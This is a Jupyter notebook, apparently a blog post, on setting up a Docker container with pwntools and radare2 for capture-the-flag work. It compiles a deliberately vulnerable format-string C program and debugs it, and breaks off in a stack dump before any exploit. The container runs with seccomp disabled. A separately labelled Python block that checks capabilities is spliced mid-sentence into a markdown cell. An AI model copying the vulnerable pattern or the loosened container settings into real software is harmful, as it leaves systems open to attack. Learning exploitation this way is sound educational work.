{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# Attack Jupyter!\n", "\n", "I've been tripping with [Jupyter](https://jupyter.org/) a lot lately. I love that it's both a markdown editor and a live python code prompt, and I've been working on making the most out of it. So far, I've mostly used it to document my capture-the-flag challenges, but I think that in the long term it could serve as a collaborative reporting and pentesting tool. I've still got a long way to go until that happens, but in the meantime I thought I'd collect my thoughts in blog post form :)\n", "\n", "## Installing jupyter\n", "\n", "The beautiful thing about jupyter is that it runs on python. If you have python running, launching `python -m pip install jupyter` will be enough to get you going. Simple, right? Yeah, too simple for me. Boring. This is why I decided that I wanted to get my jupyter notebook running in a docker `\\_(^.^)_/`. Seriously, though, running jupyter in a docker makes it portable across operating systems, and keeps it clean and independent from your host's installation. Also, it's a web application... that can access your file system and allow you to run code on it. A modicum of isolation is in order here.\n", "\n", "I have two files: a Dockerfile for setting up my docker image, and a Makefile for building, running, stopping and starting my container.\n", "\n", "Here's the Dockerfile:\n", "\n", "```\n", "FROM ubuntu\n", "RUN apt-get update\n", "RUN apt-get upgrade -y\n", "RUN apt-get install -y python3 python3-pip python python-pip radare2 build-essential\n", "RUN python3 -m pip install ipython jupyter\n", "RUN python -m pip install pwntools r2pipe pwntools-dbg-r2 ipython jupyter\n", "RUN useradd -ms /bin/bash jupyter\n", "USER jupyter\n", "WORKDIR /notebook\n", "```\n", "\n", "A couple of notes, here: first, you'll notice I'm installing python 2 and 3, along with the jupyter packages for both. 
The order of installation is important - first python3, then python2. I'm installing python 2 here because I want to use pwntools, but I also want python 3 up and running because it's 2019 and python 2 will eventually go the way of the dodo. Second, you could just install `python3`, `python3-pip` and run a nice, clean jupyter notebook that doesn't have all this additional stuff I've shoved into my docker. However, *I* want this extra stuff because I'm interested in using jupyter for pwnage! Last but not least: I create a *non-root* user for my docker called `jupyter`. If someone manages to gain access to my notebook, then they're a bit more limited with regard to the damage they could do.\n", "\n", "Here's the Makefile:\n", "\n", "```\n", "docker:\n", "\tdocker build -t jupyter .\n", "\n", "docker-run:\n", "\tdocker run --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --name jupyter-notebook -p 127.0.0.1:8888:8888 -v /home/inf0junki3/notebook:/notebook -it jupyter jupyter notebook --ip 0.0.0.0\n", "\n", "docker-start:\n", "\tdocker start jupyter-notebook\n", "\n", "docker-stop:\n", "\tdocker stop jupyter-notebook\n", "\n", "```\n", "\n", "You'll notice that my `docker-run` task forwards my container's port 8888 to my loopback address at port 8888. It also maps a local directory, `/home/inf0junki3/notebook`, to the `/notebook` directory on the container. Anything I write in my notebook gets saved on my host system - so I can delete my docker, update it, tweak it, recreate it, and what have you without losing my notebooks. In fact, as I write this (in jupyter) I keep stopping my container, tweaking it and rebuilding it. A bit tedious, like anything repetitive is bound to be - but otherwise easy and with no data loss. One quick last thing to point out here: you need the `--cap-add=SYS_PTRACE --security-opt seccomp=unconfined` portion to allow debugging in the container; in *principle* this should be OK... 
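What the container actually ended up with can be checked from the notebook itself. The following is an added example, not code from the original post: it reads `/proc/self/status` (readable by any process, root or not) and decodes the fields that matter for the flags above: the uid, the effective and bounding capability sets, and the seccomp mode. The capability bit numbers are the kernel's; the sample status text is constructed rather than captured, and `summarize` and `check_self` are my names.

```python
# Added example, not part of the original post: decode the parts of
# /proc/self/status that say what the container really runs with.
import os

# Bit numbers from the kernel's include/uapi/linux/capability.h
CAP_SYS_PTRACE = 19
CAP_SYS_ADMIN = 21
# Values of the Seccomp field: 0 disabled, 1 strict, 2 filter (Docker's default profile)
SECCOMP_MODES = {0: 'disabled', 1: 'strict', 2: 'filter'}


def parse_status(text):
    '''Map the key: value lines of a /proc/<pid>/status file to a dict.'''
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(':')
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def has_cap(mask_hex, bit):
    '''True when capability number `bit` is set in a CapEff/CapBnd hex mask.'''
    return bool((int(mask_hex, 16) >> bit) & 1)


def summarize(fields):
    '''Pull uid, capability and seccomp facts out of a parsed status.'''
    real_uid = int(fields['Uid'].split()[0])  # real, effective, saved, fs
    return {
        'uid': real_uid,
        'root': real_uid == 0,
        'eff_sys_ptrace': has_cap(fields['CapEff'], CAP_SYS_PTRACE),
        'bnd_sys_ptrace': has_cap(fields['CapBnd'], CAP_SYS_PTRACE),
        'bnd_sys_admin': has_cap(fields['CapBnd'], CAP_SYS_ADMIN),
        'seccomp': SECCOMP_MODES.get(int(fields.get('Seccomp', -1)), 'unknown'),
        'no_new_privs': fields.get('NoNewPrivs') == '1',
    }


def check_self():
    '''Summarize the process this code runs in (the notebook kernel).'''
    with open('/proc/self/status') as status:
        return summarize(parse_status(status.read()))


# Constructed sample, not captured from a real container: a non-root process
# in a container started with --cap-add=SYS_PTRACE --security-opt seccomp=unconfined.
# Docker's default bounding set is 00000000a80425fb; SYS_PTRACE (bit 19) adds 0x80000.
SAMPLE_STATUS = '''Name:   python
Uid:    1000    1000    1000    1000
Gid:    1000    1000    1000    1000
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80c25fb
CapAmb: 0000000000000000
NoNewPrivs:     0
Seccomp:        0
'''

if __name__ == '__main__':
    for name, value in sorted(summarize(parse_status(SAMPLE_STATUS)).items()):
        print(name, value)
    if os.path.exists('/proc/self/status'):
        print('this kernel:', check_self())
```

In a cell, `check_self()` reports on the kernel process. For the non-root `jupyter` user the effective set comes back empty even with `--cap-add=SYS_PTRACE`; the added capability is visible in the bounding set, which is what a process running as root inside the container would get, and Seccomp mode 0 confirms that `seccomp=unconfined` removed Docker's syscall filter. Launching a program under the debugger, as `r2 -d` does, only needs to ptrace a child of the same uid, so the non-root user loses nothing here.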
But I'll admit that I still have a lot to learn about docker security. My current thinking is that the container is running with a non-privileged user, and that the pid namespace is different from the host's namespace.\n", "\n", "## Your first jupyter pwn\n", "\n", "Jupyter can execute python out of the box. For example:" ] }, { "cell_type": "code", "execution_count": 1, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Collecting requests\n", " Using cached https://files.pythonhosted.org/packages/51/bd/23c926cd341ea6b7dd0b2a00aba99ae0f828be89d72b2190f27c11d4b7fb/requests-2.22.0-py2.py3-none-any.whl\n", "Collecting urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 (from requests)\n", " Using cached https://files.pythonhosted.org/packages/e6/60/247f23a7121ae632d62811ba7f273d0e58972d75e58a94d329d51550a47d/urllib3-1.25.3-py2.py3-none-any.whl\n", "Collecting certifi>=2017.4.17 (from requests)\n", " Using cached https://files.pythonhosted.org/packages/69/1b/b853c7a9d4f6a6d00749e94eb6f3a041e342a885b87340b79c1ef73e3a78/certifi-2019.6.16-py2.py3-none-any.whl\n", "Collecting chardet<3.1.0,>=3.0.2 (from requests)\n", " Using cached https://files.pythonhosted.org/packages/bc/a9/01ffebfb562e4274b6487b4bb1ddec7ca55ec7510b22e4c51f14098443b8/chardet-3.0.4-py2.py3-none-any.whl\n", "Collecting idna<2.9,>=2.5 (from requests)\n", " Using cached https://files.pythonhosted.org/packages/14/2c/cd551d81dbe15200be1cf41cd03869a46fe7226e7450af7a6545bfc474c9/idna-2.8-py2.py3-none-any.whl\n", "Installing collected packages: urllib3, certifi, chardet, idna, requests\n", "Successfully installed certifi-2019.6.16 chardet-3.0.4 idna-2.8 requests-2.22.0 urllib3-1.25.3\n", "[response.text: the fetched HTML page, shown as its text content]\n", "VNC passwords\n", "heapspray.io - a plethora of infosec garbage.\n", "VNC passwords\n", "Wed 12 March 2014\n", "We like to think of VNC passwords as encrypted; but when you consider\n", "that they're encrypted using DES (a weak encryption algorithm) with a\n", "key that is hardcoded... Well... That pretty much makes VNC\n", "passwords encoded and not encrypted. There are a few VNC\n", "password revealers out there, such\n", "as vncpwd or VNCPassView,\n", "the former can be used in Linux and the latter in Windows. A\n", "prerequisite to using these is that you have access to the VNC passwd\n", "file and/or registry. Other tools exist to snarf the VNC password out of\n", "network captures.\n", "blogroll\n", "social\n" ] } ], "source": [ "import pip\n", "pip.main([\"install\", \"requests\"])\n", "\n", "import requests\n", "response = requests.get(\"https://heapspray.io/vnc-passwords.html\")\n", "print(response.text)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "See what I did, there? I actually installed a python module, requests, via `pip` and then used it! Cool. In this manner, you could pretty much install any prerequisites you need in your docker on-the-fly, and use it for your pwns. There is one caveat: for packages that require a terminal (such as pwntools), you do have to specify environment variables at least once in the notebook before you use them:" ] }, { "cell_type": "code", "execution_count": 2, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "env: TERMINFO=/usr/share/terminfo\n", "env: PWNLIB_NOTERM=true\n" ] }, { "name": "stderr", "output_type": "stream", "text": [ "[*] Checking for new versions of pwntools\n", " To disable this functionality, set the contents of /home/inf0junki3/.pwntools-cache/update to 'never'.\n" ] }, { "name": "stdout", "output_type": "stream", "text": [ "Checking for new versions of pwntools\n", "To disable this functionality, set the contents of /home/inf0junki3/.pwntools-cache/update to 'never'.\n" ] }, { "name": "stderr", "output_type": "stream", "text": [ "[*] You have the latest version of Pwntools (3.12.2)\n" ] }, { "name": "stdout", "output_type": "stream", "text": [ "You have the latest version of Pwntools (3.12.2)\n" ] } ], "source": [ "%env TERMINFO=/usr/share/terminfo\n", "%env PWNLIB_NOTERM=true\n", "\n", "from pwn import *\n", "import r2pipe" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Now, you should be able to use pwntools to your heart's content.\n", "\n", "### Prepping pwnable code\n", "\n", "Let's take a look at an example, now. 
I lifted this code off of a site called [geeksforgeeks](https://www.geeksforgeeks.org/format-string-vulnerability-and-prevention-with-example/):" ] }, { "cell_type": "code", "execution_count": 3, "metadata": {}, "outputs": [], "source": [ "VULNERABLE_CODE = \"\"\"\n", "// A simple C program with format\n", "// string vulnerability\n", "#include <stdio.h>\n", "#include <string.h>\n", "\n", "int main(int argc, char** argv)\n", "{\n", "    // 7 bytes: no room for the terminating NUL\n", "    char secret[7] = \"penguin\";\n", "    char buffer[100];\n", "    strncpy(buffer, argv[1], 100);\n", "\n", "    // We are passing command line\n", "    // argument to printf\n", "    printf(buffer);\n", "\n", "    return 0;\n", "}\n", "\"\"\"" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "I didn't look at the solution, because I wanted to solve this from jupyter. Let's compile this:" ] }, { "cell_type": "code", "execution_count": 4, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "True\n" ] } ], "source": [ "with open(\"vulnerable.c\", \"w\") as vulnerable_file:\n", "    vulnerable_file.write(VULNERABLE_CODE)\n", "import os\n", "os.system(\"gcc vulnerable.c -o vulnerable -no-pie\")\n", "print(os.path.exists(\"vulnerable\"))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Running r2pipe\n", "\n", "Let's see how this loads up, now. 
I'm going to tell r2 to open `vulnerable` in debug mode:" ] }, { "cell_type": "code", "execution_count": 5, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "blksz 0x0\n", "block 0x100\n", "fd 5\n", "file /home/inf0junki3/notebook/research/blog_posts/vulnerable\n", "format elf64\n", "iorw true\n", "mode -rwx\n", "referer dbg:///home/inf0junki3/notebook/research/blog_posts/vulnerable aaaabbbbccccdddd\n", "type EXEC (Executable file)\n", "arch x86\n", "binsz 6492\n", "bintype elf\n", "bits 64\n", "canary true\n", "class ELF64\n", "crypto false\n", "endian little\n", "havecode true\n", "intrp /lib64/ld-linux-x86-64.so.2\n", "lang c\n", "linenum true\n", "lsyms true\n", "machine AMD x86-64 architecture\n", "maxopsz 16\n", "minopsz 1\n", "nx true\n", "os linux\n", "pcalign 0\n", "pic false\n", "relocs true\n", "relro partial\n", "rpath NONE\n", "static false\n", "stripped false\n", "subsys linux\n", "va true\n", "\n", "[Symbols]\n", "027 0x00000500 0x00400500 LOCAL FUNC 0 deregister_tm_clones\n", "028 0x00000530 0x00400530 LOCAL FUNC 0 register_tm_clones\n", "029 0x00000570 0x00400570 LOCAL FUNC 0 __do_global_dtors_aux\n", "030 0x00001040 0x00601040 LOCAL OBJECT 1 completed.7697\n", "031 0x00000e18 0x00600e18 LOCAL OBJECT 0 __do_global_dtors_aux_fini_array_entry\n", "032 0x000005a0 0x004005a0 LOCAL FUNC 0 frame_dummy\n", "033 0x00000e10 0x00600e10 LOCAL OBJECT 0 __frame_dummy_init_array_entry\n", "036 0x000007ec 0x004007ec LOCAL OBJECT 0 __FRAME_END__\n", "038 0x00000e18 0x00600e18 LOCAL NOTYPE 0 __init_array_end\n", "039 0x00000e20 0x00600e20 LOCAL OBJECT 0 _DYNAMIC\n", "040 0x00000e10 0x00600e10 LOCAL NOTYPE 0 __init_array_start\n", "041 0x000006b4 0x004006b4 LOCAL NOTYPE 0 __GNU_EH_FRAME_HDR\n", "042 0x00001000 0x00601000 LOCAL OBJECT 0 _GLOBAL_OFFSET_TABLE_\n", "043 0x000006a0 0x004006a0 GLOBAL FUNC 2 __libc_csu_fini\n", "045 0x00001030 0x00601030 WEAK NOTYPE 0 data_start\n", "046 0x00001040 0x00601040 GLOBAL NOTYPE 0 _edata\n", 
"047 0x000006a4 0x004006a4 GLOBAL FUNC 0 _fini\n", "051 0x00001030 0x00601030 GLOBAL NOTYPE 0 __data_start\n", "053 0x00001038 0x00601038 GLOBAL OBJECT 0 __dso_handle\n", "054 0x000006b0 0x004006b0 GLOBAL OBJECT 4 _IO_stdin_used\n", "055 0x00000630 0x00400630 GLOBAL FUNC 101 __libc_csu_init\n", "056 0x00601048 0x00601048 GLOBAL NOTYPE 0 _end\n", "057 0x000004f0 0x004004f0 GLOBAL FUNC 2 _dl_relocate_static_pie\n", "058 0x000004c0 0x004004c0 GLOBAL FUNC 43 _start\n", "059 0x00001040 0x00601040 GLOBAL NOTYPE 0 __bss_start\n", "060 0x000005a7 0x004005a7 GLOBAL FUNC 134 main\n", "061 0x00001040 0x00601040 GLOBAL OBJECT 0 __TMC_END__\n", "062 0x00000460 0x00400460 GLOBAL FUNC 0 _init\n", "001 0x00000490 0x00400490 GLOBAL FUNC 16 imp.strncpy\n", "002 0x000004a0 0x004004a0 GLOBAL FUNC 16 imp.__stack_chk_fail\n", "003 0x000004b0 0x004004b0 GLOBAL FUNC 16 imp.printf\n", "004 0x00000000 0x00400000 GLOBAL FUNC 16 imp.__libc_start_main\n", "005 0x00000000 0x00400000 WEAK NOTYPE 16 imp.__gmon_start__\n", "004 0x00000000 0x00400000 GLOBAL FUNC 16 imp.__libc_start_main\n", "005 0x00000000 0x00400000 WEAK NOTYPE 16 imp.__gmon_start__\n", "\n", "\u001b[36m \u001b[0m\u001b[36m \u001b[0m;-- \u001b[36mmain:\u001b[0m\n", "\u001b[36m/ \u001b[0m\u001b[31m(fcn) sym.main\u001b[0m 134\n", "\u001b[36m| \u001b[0m \u001b[31m sym.main\u001b[0m ();\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_90h @ rbp-0x90\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_84h @ rbp-0x84\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_77h @ rbp-0x77\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_73h @ rbp-0x73\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_71h @ rbp-0x71\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_70h @ rbp-0x70\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_8h @ 
rbp-0x8\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m \u001b[31m; DATA XREF from 0x004004dd (entry0)\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005a7\u001b[0m \u001b[33m55\u001b[0m \u001b[35mpush\u001b[36m rbp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005a8\u001b[0m \u001b[33m48\u001b[37m89\u001b[37me5\u001b[0m \u001b[37mmov\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m rsp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005ab\u001b[0m \u001b[33m48\u001b[37m81\u001b[37mec\u001b[37m90\u001b[32m00\u001b[32m00\u001b[37m.\u001b[0m \u001b[33msub\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x90\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005b2\u001b[0m \u001b[37m89\u001b[37mbd\u001b[33m7c\u001b[31mff\u001b[31mff\u001b[31mff\u001b[0m \u001b[37mmov dword\u001b[36m \u001b[0m[\u001b[36mlocal_84h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m edi\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005b8\u001b[0m \u001b[33m48\u001b[37m89\u001b[37mb5\u001b[33m70\u001b[31mff\u001b[31mff\u001b[37m.\u001b[0m \u001b[37mmov qword\u001b[36m \u001b[0m[\u001b[36mlocal_90h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m rsi\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005bf\u001b[0m \u001b[33m64\u001b[33m48\u001b[37m8b\u001b[37m04\u001b[33m25\u001b[33m28\u001b[37m.\u001b[0m \u001b[37mmov\u001b[36m rax\u001b[0m,\u001b[36m qword\u001b[36m fs:\u001b[0m[\u001b[36m\u001b[33m0x28\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[31m ; [0x28:8]=-1\u001b[31m ; '('\u001b[31m ; 40\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005c8\u001b[0m \u001b[33m48\u001b[37m89\u001b[33m45\u001b[37mf8\u001b[0m \u001b[37mmov qword\u001b[36m \u001b[0m[\u001b[36mlocal_8h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m 
rax\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005cc\u001b[0m \u001b[33m31\u001b[37mc0\u001b[0m \u001b[36mxor\u001b[36m eax\u001b[0m,\u001b[36m\u001b[36m eax\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005ce\u001b[0m \u001b[37mc7\u001b[33m45\u001b[37m89\u001b[33m70\u001b[33m65\u001b[33m6e\u001b[37m.\u001b[0m \u001b[37mmov dword\u001b[36m \u001b[0m[\u001b[36mlocal_77h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x676e6570\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005d5\u001b[0m \u001b[33m66\u001b[37mc7\u001b[33m45\u001b[37m8d\u001b[33m75\u001b[33m69\u001b[0m \u001b[37mmov word\u001b[36m \u001b[0m[\u001b[36mlocal_73h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x6975\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005db\u001b[0m \u001b[37mc6\u001b[33m45\u001b[37m8f\u001b[33m6e\u001b[0m \u001b[37mmov byte\u001b[36m \u001b[0m[\u001b[36mlocal_71h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x6e\u001b[0m\u001b[0m\u001b[31m ; 'n'\u001b[31m ; 110\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005df\u001b[0m \u001b[33m48\u001b[37m8b\u001b[37m85\u001b[33m70\u001b[31mff\u001b[31mff\u001b[37m.\u001b[0m \u001b[37mmov\u001b[36m rax\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_90h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005e6\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mc0\u001b[37m08\u001b[0m \u001b[33madd\u001b[36m rax\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005ea\u001b[0m \u001b[33m48\u001b[37m8b\u001b[37m08\u001b[0m \u001b[37mmov\u001b[36m rcx\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| 
\u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005ed\u001b[0m \u001b[33m48\u001b[37m8d\u001b[33m45\u001b[37m90\u001b[0m \u001b[37mlea\u001b[36m rax\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_70h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005f1\u001b[0m \u001b[37mba\u001b[33m64\u001b[32m00\u001b[32m00\u001b[32m00\u001b[0m \u001b[37mmov\u001b[36m edx\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x64\u001b[0m\u001b[0m\u001b[31m ; 'd'\u001b[31m ; 100\u001b[0m \u001b[37m; size_t n\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005f6\u001b[0m \u001b[33m48\u001b[37m89\u001b[37mce\u001b[0m \u001b[37mmov\u001b[36m rsi\u001b[0m,\u001b[36m\u001b[36m rcx\u001b[0m\u001b[0m\u001b[0m \u001b[37m; const char * src\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005f9\u001b[0m \u001b[33m48\u001b[37m89\u001b[37mc7\u001b[0m \u001b[37mmov\u001b[36m rdi\u001b[0m,\u001b[36m\u001b[36m rax\u001b[0m\u001b[0m\u001b[0m \u001b[37m; char *dest\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005fc\u001b[0m \u001b[37me8\u001b[37m8f\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.strncpy\u001b[0m\u001b[0m\u001b[31m ; char *strncpy(char *dest, const char *src, size_t n)\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400601\u001b[0m \u001b[33m48\u001b[37m8d\u001b[33m45\u001b[37m90\u001b[0m \u001b[37mlea\u001b[36m rax\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_70h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400605\u001b[0m \u001b[33m48\u001b[37m89\u001b[37mc7\u001b[0m \u001b[37mmov\u001b[36m rdi\u001b[0m,\u001b[36m\u001b[36m rax\u001b[0m\u001b[0m\u001b[0m \u001b[37m; const char * format\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400608\u001b[0m \u001b[37mb8\u001b[32m00\u001b[32m00\u001b[32m00\u001b[32m00\u001b[0m 
\u001b[37mmov\u001b[36m eax\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040060d\u001b[0m \u001b[37me8\u001b[37m9e\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.printf\u001b[0m\u001b[0m\u001b[31m ; int printf(const char *format)\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400612\u001b[0m \u001b[37mb8\u001b[32m00\u001b[32m00\u001b[32m00\u001b[32m00\u001b[0m \u001b[37mmov\u001b[36m eax\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400617\u001b[0m \u001b[33m48\u001b[37m8b\u001b[33m55\u001b[37mf8\u001b[0m \u001b[37mmov\u001b[36m rdx\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_8h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040061b\u001b[0m \u001b[33m64\u001b[33m48\u001b[33m33\u001b[37m14\u001b[33m25\u001b[33m28\u001b[37m.\u001b[0m \u001b[36mxor\u001b[36m rdx\u001b[0m,\u001b[36m qword\u001b[36m fs:\u001b[0m[\u001b[36m\u001b[33m0x28\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m ,=< \u001b[0m\u001b[32m0x00400624\u001b[0m \u001b[33m74\u001b[37m05\u001b[0m \u001b[32mje 0x40062b\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m | \u001b[0m\u001b[32m0x00400626\u001b[0m \u001b[37me8\u001b[33m75\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.__stack_chk_fail\u001b[0m\u001b[0m\u001b[31m ; void __stack_chk_fail(void)\n", "\u001b[36m| \u001b[0m\u001b[36m `-> \u001b[0m\u001b[32m0x0040062b\u001b[0m \u001b[37mc9\u001b[0m \u001b[1;35mleave\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040062c\u001b[0m \u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", "\n" ] } ], "source": [ "r2 = r2pipe.open(\"vulnerable\", flags = [\"-d\", \"-e\", \"scr.color=true\"])\n", "r2.cmd(\"aaaa\")\n", 
"r2.cmd(\"doo aaaabbbbccccdddd\")\n", "print(r2.cmd(\"iy\"))\n", "print(r2.cmd(\"is\"))\n", "print(r2.cmd(\"pdf @ main\"))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "One should note here that on my physical host I had r2dec running as well, which allowed me to decompile the code with `pdd @ main`. Sadly, this doesn't work in my docker setup. Why? Because the current version of the radare2 package in the apt repository appears to be behind the packages set up with r2pm - so r2dec fails to compile. One way of addressing this is to get the latest version of radare2 - there are even nifty instructions on how to do this here: http://radare.today/posts/getting-the-latest-radare2/. But I'm happy to look at the disassembly for now; the r2dec decompiler does not bring all that much when compared to Ida Pro's decompiler or ghidra's. Maybe one day I'll change my mind.\n", "\n", "As an argument, I specified \"aaaabbbbccccdddd\". I want to leak the secret here, which is \"penguin\". 
I want to break right after printf and then show the stack:" ] }, { "cell_type": "code", "execution_count": 6, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "u''" ] }, "execution_count": 6, "metadata": {}, "output_type": "execute_result" } ], "source": [ "r2.cmd(\"db 0x0040060d\")\n", "r2.cmd(\"dcu main\")\n", "r2.cmd(\"dc\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "To dump the same kind of information that I would see in Radare2's visual mode, I'd use something like this:" ] }, { "cell_type": "code", "execution_count": 7, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n", "\u001b[32m0x7ffcf638f620\u001b[0m \u001b[37m98\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m10\u001b[0m\u001b[33m57\u001b[0m \u001b[33m43\u001b[0m\u001b[37mc1\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33mW\u001b[0m\u001b[33mC\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f630\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[33m70\u001b[0m \u001b[33m65\u001b[0m\u001b[33m6e\u001b[0m \u001b[33m67\u001b[0m\u001b[33m75\u001b[0m 